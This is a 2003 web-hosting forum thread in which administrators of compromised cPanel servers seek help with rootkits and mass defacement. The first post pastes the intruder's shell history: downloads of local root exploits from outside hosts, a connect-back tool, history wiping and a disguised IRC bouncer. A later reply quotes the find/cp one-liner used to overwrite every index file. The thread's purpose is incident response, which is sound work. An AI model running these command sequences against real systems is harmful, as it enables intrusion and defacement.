The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

new server got hacked

Discussion in 'General Discussion' started by brumie, Dec 11, 2003.

  1. brumie

    brumie Active Member

    Joined:
    Dec 9, 2003
    Messages:
    42
    Likes Received:
    0
    Trophy Points:
    6
    just got hacked
    moving to new server and after few hours got hacked

    all index.* has been replaced
    including all cpanel themes and all clients

    so when u logged on http://server/cpanel
    http://server/webmail
    all you see is the hacker page
    http://vipixel.com/hacked.jpg

    I can delete the username techteam which uid is 0
    but how to remove the hidden Trojan?
    says it has hidden pid

    uid 0 account (techteam) - BAD!
    --> Hidden Pid detected! [pid 10]
    --> hidden from ps: [yes]
    --> hidden from kernel: [yes]

    here's the log i can grab:
    Code:
    ls
    ./pt
    ./kmod
    ./own
    ./klogd
    ./kmod
    rm kmod
    rm -rf kmod
    wget [url]www.viperhaxu.hpg.com.br/ptrace[/url]
    chmod ptrace
    chmod 777 ptrace
    ./ptrace
    wget [url]www.skater0x.hpg.com.br/local/kmod[/url]
    chmod 777 kmod.1
    ./kmod.1
    ./newlocal
    gcc fedor.c -o fedor
    ls
    ./f
    uname -a
    chmod 777 f
    ./f
    id
    pwd
    wget [url]www.skater0x.hpg.com.br/xpll/cancer[/url]
    echo SU3D OWNZ > index.txt
    chmod 777 cancer
    ./cancer index.txt
    ls
    rm bind.txt
    ls -la
    cat .bash_history
    ls
    ./kmod
    ./cbd
    ./cbd 10.28.88.142
    cat fedor.c
    ./f
    ./ptrace
    c
    ./pt
    z
    ls
    ls
    ./setuid
    id
    ./ptrace
    ./own
    ./ptrace
    wget [url]www.creatividade.hpg.com.br/locals[/url]
    chmod 777 locals
    ./locals
    ./locals
    ./locals
    rm -rf locals
    ls
    ./ptrace
    echo lol >.bash_history
    ls
    ./td
    id
    ./pt
    id
    ./td
    ls
    w
    id
    mkdir sess_ff65a18f2fbe9e2e1346ea32e1fc1c83
    cd sess_ff65a18f2fbe9e2e1346ea32e1fc1c83
    wget thecoreteam.home.ro/pt
    chmod +x pt
    ./pt
    ./pt
    ./pt
    ./pt
    ./pt
    wget [url]www.geocities.com/sorin_smen/psybnc.tgz[/url]
    ls
    rm -rf *
    cd ..
    ls
    rm -rf *
    ls
    ./newlocal
    ./localroot
    ./own
    ./kmod
    rm -rf *
    chmod +wrx setuid
    id
    ls -all
    ls
    rm -rf sess_fc187590539417321dd72b37686e7e27
    cd [url]www.geocities.com/sorin_smen/psybnc.tgz[/url]
    cd sess_ff65a18f2fbe9e2e1346ea32e1fc1c82
    mkdir sess_ff65a18f2fbe9e2e1346ea32e1fc1c84
    cd sess_ff65a18f2fbe9e2e1346ea32e1fc1c84
    wget [url]www.geocities.com/sorin_smen/psybnc.tgz[/url]
    tar zxvf psybnc.tgz
    cd psybnc
    ./psybnc
    kill -9 32751
    rm -rf psybnc.conf
    wget thecoreteam.home.ro/psybnc.conf
    mv psybnc "squid -D"
    ./"squid -D"
    exit
    id
    ./km
    ls
    ls -al km
    ./km
    ./km
    ./km;./km;./km
    exit
    
    i run this:
    [~/apps/chkrootkit-0.42b]# ./chkrootkit
    Checking `bindshell'... INFECTED (PORTS: 465)
    but seem false alarm...

    how to clearly remove the trojan file?
    please please help.
    FYI server updated to latest kernel 2.4.23
    but we're still worried about this mass defacement attack.

    mind to share tips and tricks security setting for WHM/CPanel?

    Thanks in advance,
    Brumie
     
  2. welo

    welo Well-Known Member

    Joined:
    Nov 11, 2002
    Messages:
    71
    Likes Received:
    0
    Trophy Points:
    6
    Someone was working fast then and knew you had a new box that wasn't patched (so it's likely someone you know). I have a friend who had a similar hack done on an unpatched box last spring. It's almost identical. I suggest you get ready to reimage, and be thankful it's a new install so you don't have to worry about complex backups.
     
  3. hot_wired13

    hot_wired13 Active Member

    Joined:
    Oct 17, 2003
    Messages:
    34
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    127.0.0.1
    ok, lets get down to the basics, shall we?

    ptrace = LOCAL kernel exploit
    kmod = LOCAL kernel exploit

    so, how did he get in?
    he needed a shell, right?

    simple. u must be using redhat9. thats how ptrace+kmod worked. there is a similar exploit called ptrace-km3.c . its both combined together, same way, but alot faster.

    if u notice, he was rm-ing files (at the start of the logs). only possibility would be cos the exploits dont work. that means 2 things - 1. this is his first attempt on ur box (or at least after the install) 2. he's an idiot who has bad memory. hackers do not usually rm their tools. they keep it for future use ;)

    now, how did he get a shell on your box? simple. redhat9 has a REMOTE amba exploit which spawns a user on the box. check your system logs, maybe u'd get a clue. if he's such an idiot who doesnt clear bash history, u can bet he wont clear system logs.

    also, the fact that he heeps using .com.br free webhosts (probably free, at least) most probably shows that he is living in .br. same thing with romanians, they love to use .ro freehosts. its faster for them to upload xploits. (well, the clever hacker would use a carded domain and his own server. wont be so stupid to use a freehost - logs are all over the place)

    anyways, he didn do a clean job, notice the chmodding and shit. if i were him, i'd write a ready made bash script, to provide me all the info i need. so u'd see almost nothing ;)

    hmm, below are some *GUESSES* on what each file does:

    cancer = spreads whatever is in index.txt to every single index.* file. very very very lame file. in my opinion.

    psybnc = as it says, a irc bouncer.

    setuid = possible too to change his own userid? to change his uid to 0 so he'd be root

    "squid -D" = psybnc, as i said above, disguised as a squid proxy. could also imply that he has USED squid to setup proxies on other box and is familiar with the commands.

    newlocal and localroot = sounds like a rootkit to me

    oh, and yes, theres something about kmod and ptrace - the exploitation is NOT instant, requires some time, but the ptrace-kmod3 is instant i think, havent used it in a long time

    seriously, i think he has patched your box, maybe thats why he was runnin km at the last part? hackers dont like other hackers in their box, lol.

    ok... now, how to track him down and kill him. 1. dont format the box... yet.
    2. check out his psybnc stuff, as in the now, squid -D...
    3. check out the psybnc.conf. no point lookin at the wget'ed copy, cos its a generic one. his password should be encrypted, but oh well... better than nothing.
    4. add another ADMIN account to the psybnc conf and rehash it.
    5. go in there, and wait wait wait, until he comes in. since u're admin, u should be able to see his real ip address...
    6. call the feds :)

    et voila. there, u caught ur hacker.
    however, removal of rootkit is not exactly easy, lots of memory hooks and stuff.

    prevention: ALWAYS use up2date if u're with redhat... set crons every 3 hours for up2date -p and 5 mins later up2date -u, should keep u very safe.

    erm, if im wrong about anything, someone feel free to correct me. thanks. if anyone needs help, im available at kelvin [at] hostform.net.

    regards,
    kelvin
    hostform internet services
     
  4. damainman

    damainman Well-Known Member

    Joined:
    Nov 13, 2003
    Messages:
    515
    Likes Received:
    0
    Trophy Points:
    16
    You think i could borrow some of your knowledge and put it in my brain for awhile...:eek:

    How long did it take you to learn all that?.. Any suggestions, sites, resources u can provide that will help keep out boxes secure.

    I'm currently running RH9+APF+Tripwire.... but i'm still clueless to how to effectly check logs and maintain APF and tripwire....:confused:

    Thanks in advance
     
  5. Nico

    Nico Well-Known Member

    Joined:
    Dec 5, 2001
    Messages:
    233
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Edmond, OK
    These SOB's have hit a few other servers this week. So far all I've found is the t0rn root kit installed and all the index.* files replaced. You can correct all the Cpanel index problems by changing your updated prefs to the next release or down a release and /scripts/update now and /scripts/upcp. Then I rm -rf /home/*/public_html/index*

    After that it's time to email the users to replace their index files.

    I also reccomend recompiling the Kernel and making sure Apache, PHP etc is currrent.


    This is how they replaced the index files:

    188 lswget http://www.cimentsorigny.com/rula2.htm
    189 wget http://www.cimentsorigny.com/rula2.htm
    190 mv rula2.htm index.html
    191 find / -name "index.*" -exec cp /tmp/index.html {} \;
     
    #5 Nico, Dec 12, 2003
    Last edited: Dec 13, 2003
  6. brumie

    brumie Active Member

    Joined:
    Dec 9, 2003
    Messages:
    42
    Likes Received:
    0
    Trophy Points:
    6
    wow thank you guys for the feedback
    hot_wired & Nico
    gr8 explaination :)
    that's help me to learn security

    sorry for not being clear
    it's redhat 7.3
    running latest RELEASE tree
    i did re-compile the kernel to the latest did some search chkroot and monitoring with iptraf and looks fine.

    tail /etc/rc.sysinit
    [ -r /proc/ksyms ] && /bin/cat /proc/ksyms) >/var/log/ksyms.0
    # create the crash indicator flag to warn on crashes, offer fsck with timeout
    touch /.autofsck
    sleep 1
    kill -TERM `/sbin/pidof getkey` >/dev/null 2>&1
    } &
    if [ "$PROMPT" != "no" ]; then
    /sbin/getkey i && touch /var/run/confirm
    fi
    wait

    looks fine
    BUT
    today got email from the server:
    Trojan Horses Detected by (WHM)
    Hidden Pid detected! [pid 10]
    hidden from ps: [yes]
    hidden from kernel: [yes]
    binary location: [/sbin/init]

    oh gawd again?
    does it will solve the problem if i just replace it with trusted init ?
    how the hell I can find the trustable binary init anyway?
    If I'm replace with the original init from the CD will this causing problem since I already running update here and there?


    Thanks in advance
    Brumie
     
  7. Nico

    Nico Well-Known Member

    Joined:
    Dec 5, 2001
    Messages:
    233
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Edmond, OK
    I've seen that a few times this week as well.

    You can delete that init file and replace it with one from the CD if you can locate it or one from a like server. I have a clean archived version that I have been using PM me if you'd like instructions on how to access and install that one.
     
  8. hot_wired13

    hot_wired13 Active Member

    Joined:
    Oct 17, 2003
    Messages:
    34
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    127.0.0.1
    *faints* redhat 7.3? sheesh, thats even MORE buggy than redhat9... not only ptrace works, samba, ssh, proftpd, everything works lol.

    actually, i'd reccommend u just backup ur stuff, and reinstall. and BE at the datacenter or be online when that happens. the second after ur box is online, use redhat's up2date. 100% trusted and safe. if, however, u want a redhat paid account for updating purposes... er, email me... kelvin [at] hostform.net... i have a *cough* paid *cough* rhn acc which i dont use anymore, cos i switched to freebsd... ill lend it to u :)

    yea, u could probably replace some files.. however, u never know if theres memory hooks or some stuff running.. thats what im afraid of...
     
  9. compunet2

    compunet2 Well-Known Member

    Joined:
    Feb 21, 2003
    Messages:
    310
    Likes Received:
    0
    Trophy Points:
    16
    By chance, were you or any of your users running the script My eGallery? You could check the apache logs, which would show it. Also, did you have /tmp set to noexec, nosuid?
     
  10. brumie

    brumie Active Member

    Joined:
    Dec 9, 2003
    Messages:
    42
    Likes Received:
    0
    Trophy Points:
    6
    the tech found it execution from 4images gallery (nobody) to tmp session


    and the OS reloaded now :|
    just for sure...

    thanks all for the help....
     
  11. ivaserver

    ivaserver Well-Known Member

    Joined:
    Aug 9, 2002
    Messages:
    111
    Likes Received:
    0
    Trophy Points:
    16
    my servr has been hacked

    my server has also been hacked by IR4DEX GR0UP

    all index files on the server have been defaced and in some account all pages wre defaced

    also customers cannot log in to phpmyadmin.

    i do not know the full extent of the damage done.

    I have been told i need to do a OS reload

    where can i get information on how to do this?

    Thanks
    Ivaserver
     
  12. brumie

    brumie Active Member

    Joined:
    Dec 9, 2003
    Messages:
    42
    Likes Received:
    0
    Trophy Points:
    6
    Re: my servr has been hacked

    for OS reload, you have to submit ticket to your dedicated provider,
    before that you can reinstall the cpanel
    rm -rf /usr/local/cpanel/cpanel
    /scripts/updatenow
    /scripts/upcp
    /scripts/updateuserdomains2

    that will bring back cpanel including phpmyadmin

    if u have backup customer data, u're safe, but if not... oh man hurts restoring all index.*
     
  13. ivaserver

    ivaserver Well-Known Member

    Joined:
    Aug 9, 2002
    Messages:
    111
    Likes Received:
    0
    Trophy Points:
    16
    Thanks for the help

    it has helped a lot

    phpmyadmin is now OK

    I have just received this email

    IMPORTANT: Do not ignore this email.
    This message is to inform you that the
    account smurf has user id 0 (root privs). This could mean that
    your system was compromised (OwN3D). To be safe you should verify that your
    system has not be compromised.

    in this account there are 5 files

    .bash_history

    passwd root
    root@space2 [~]# passwd root
    Changing password for user root.
    w




    .bash_logout

    # ~/.bash_logout

    clear




    .bash_profile

    # .bash_profile

    # Get the aliases and functions
    if [ -f ~/.bashrc ]; then
    . ~/.bashrc
    fi

    # User specific environment and startup programs

    PATH=$PATH:$HOME/bin

    export PATH
    unset USERNAME





    .bashrc

    # .bashrc

    # User specific aliases and functions

    # Source global definitions
    if [ -f /etc/bashrc ]; then
    . /etc/bashrc
    fi




    .emacs

    ;; Red Hat Linux default .emacs initialization file

    ;; Are we running XEmacs or Emacs?
    (defvar running-xemacs (string-match "XEmacs\\|Lucid" emacs-version))

    ;; Set up the keyboard so the delete key on both the regular keyboard
    ;; and the keypad delete the character under the cursor and to the right
    ;; under X, instead of the default, backspace behavior.
    (global-set-key [delete] 'delete-char)
    (global-set-key [kp-delete] 'delete-char)

    ;; Turn on font-lock mode for Emacs
    (cond ((not running-xemacs)
    (global-font-lock-mode t)
    ))

    ;; Visual feedback on selections
    (setq-default transient-mark-mode t)

    ;; Always end a file with a newline
    (setq require-final-newline t)

    ;; Stop at the end of the file, not just add lines
    (setq next-line-add-newlines nil)

    ;; Enable wheelmouse support by default
    (cond (window-system
    (mwheel-install)
    ))



    Do i just need to remove the account to stop the hackers access?

    Thanks Ivaserver
     
    #13 ivaserver, Dec 23, 2003
    Last edited: Dec 23, 2003
  14. brumie

    brumie Active Member

    Joined:
    Dec 9, 2003
    Messages:
    42
    Likes Received:
    0
    Trophy Points:
    6
    oh yes just delete that uid
    i seen that too and delete the user line:
    pico /etc/passwd

    but believe it or not there must be hidden process
    run chkrootkit (search on this forum on how to install it)
    also check on tmp

    cd /tmp
    ls -la

    find weird unussual files/directory there
    but it'll be good if u releod the OS and get kernel update and find some threads about securing whm/cpanel, i found it very usefull :)
     
  15. Diatone

    Diatone Well-Known Member

    Joined:
    Aug 22, 2001
    Messages:
    111
    Likes Received:
    0
    Trophy Points:
    16
    me to

    mine got hacked by a group called dogm4 - same crap. I didnt have my kernel updated. Stupid me. First time in 5 years I've gotten hacked. Caught it soon though, and restored sites within the hour. Bastards. I actually was able to find the people who did this, and the IP of them, along with there phone, real e-mail, address, age, city, etc. There in Brazil. Any charges I can file? Anything at all I can do?
     
  16. Diatone

    Diatone Well-Known Member

    Joined:
    Aug 22, 2001
    Messages:
    111
    Likes Received:
    0
    Trophy Points:
    16
    http://www.delta5.com.br/mirror/topdefacer/

    Those are the fags who got all of us... Trust me. Little HACKING COMPETITION> WOOO HOO FUN STUFF. I want to meet them face to face and see what the punk script kiddies have to say.
     
  17. compunet2

    compunet2 Well-Known Member

    Joined:
    Feb 21, 2003
    Messages:
    310
    Likes Received:
    0
    Trophy Points:
    16
    Most likely nothing you can do. See: http://grc.com/dos/grcdos.htm
    I also had the same thing with TechTeam changing all the index files. I have since upgraded the kernel, changed the permission on the /tmp directory, removed compilers, and blocked their IP range, but would still like to know exactly how they did it, or if any of this would have stopped them. Also, how did you find out so much information about them anyway? Maybe you should make the info public, and see how they like it... lol
     
  18. ivaserver

    ivaserver Well-Known Member

    Joined:
    Aug 9, 2002
    Messages:
    111
    Likes Received:
    0
    Trophy Points:
    16
    my server provider killed the processes that were started by the hackers. This included a Half-Life server, an ircd and several unknown programs
     
  19. ivaserver

    ivaserver Well-Known Member

    Joined:
    Aug 9, 2002
    Messages:
    111
    Likes Received:
    0
    Trophy Points:
    16
    deleted
     
    #19 ivaserver, Dec 24, 2003
    Last edited: Dec 24, 2003
  20. B12Org

    B12Org Well-Known Member

    Joined:
    Jul 15, 2003
    Messages:
    692
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Seattle Washington
    cPanel Access Level:
    Root Administrator
    What counts as wierd or unusal files/dirs?
     
Loading...

Share This Page